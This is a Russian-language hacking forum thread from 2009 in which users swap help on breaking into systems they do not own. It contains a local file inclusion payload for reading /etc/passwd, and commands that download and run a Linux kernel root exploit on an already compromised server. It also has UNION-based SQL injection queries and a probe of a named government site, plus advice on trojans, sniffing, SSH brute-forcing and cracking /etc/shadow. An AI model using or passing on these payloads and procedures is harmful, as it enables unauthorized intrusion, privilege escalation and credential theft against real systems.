Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция:
    Code:
    include('page[COLOR=Red]1.php/../../../../../../../etc/passwd%00[/COLOR].php');
    При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
     
  2. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Я на всякий случай проверил код - на gentoo linux сработало как с добавлением слеша, так и вообще без него, т.е. ?lfi=../../../../../../../../etc/passwd работает.
     
  3. Jessi Parker

    Jessi Parker New Member

    Joined:
    10 Dec 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как взломать комп по LAN.
    P.S. Спрашиваю чисто в учебных целях)))
     
  4. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    1 Запустить троян на удалённый комп
    - найти приват трой или купить его билд.
    - послать ссылку с ****** / либо тупо впарить.
    2 Использовать Сплоиты
    - найти свежую дырку (в баг листах)
    - ну и естественно придётся порты сканить на наличие уязвимых сервисов.
    3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
    - берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
    4 Снифание трафика.
    - вешаем снифер и ловим пароли.
    5 Можно взломать роутер.
     
  5. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    Есть шелл на сервер. Нада получить рута. Беру этот сплойт:

    http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт)

    При копмиляции выдаёт кучу ошибок:( Может нужно сплойт подправить, хз :( ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?
     
    #10565 [Forest], 10 Dec 2009
    Last edited: 10 Dec 2009
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    uname -a
    Покажи что выводит данная команда.
    Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641

    Юзать примерно так:
    Code:
    cd /tmp
    mkdir my
    chmod 777 my
    cd my
    wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    tar xvfz 2009-linux-sendpage3.tar.gz
    chmod 777 linux-sendpage3 -R
    cd linux-sendpage3
    ./run
    id
     
  7. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    ./run
    mmap: Permission denied
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Значит патченное ядро.
     
  9. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.pz.gov.ua/login/login.php?lid=1
    при подставлении кавычки в поле логин...

    шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

    а так

    http://www.pz.gov.ua/login/login.php?lid=-1

    ORA-00936: missing expression

    это как понимать? один сайт работает на разных БД?
     
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    _http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
     
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну там еще и мускуль...
     
  12. Jessi Parker

    Jessi Parker New Member

    Joined:
    10 Dec 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спс, половину не понял. Дальше буду Гуглить.
     
  13. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
     
    #10574 Pashkela, 10 Dec 2009
    Last edited: 10 Dec 2009
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    мб добавить юзера?

    ззы

    Pashkela,
    а по-моему :
    уже как бы подразумевает,что у чела рут..не?
     
    1 person likes this.
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh)

    как?
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 $n@ke:

    да, я как всегда невмнимателен
     
    1 person likes this.
  18. R@X

    R@X New Member

    Joined:
    5 Oct 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!
    Товарищи нужна ваша помощь.
    В общем проблема заключается в следующем:
    Нашел одну уязвимость на сайте в общем определил базу, колонки.
    Сделал запрос след. вида:
    http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(column_name),14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_name=0x7573657273--
    колонки видно все норм
    далее
    http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
    он выдает ошибку след. содержания:
    Query failed: Table 'site.users' doesn't exist
    походу тут стоят ограничения.
    как обойти подскажите плиз, какой надо сформировать запрос?
     
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 .:[melkiy]:.
     
  20. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    25+from+table.db
    или
    25+from+db.table
    точно не помню , мне Пашкелла как то описывал способ этот, благодарен ему)
     
Thread Status:
Not open for further replies.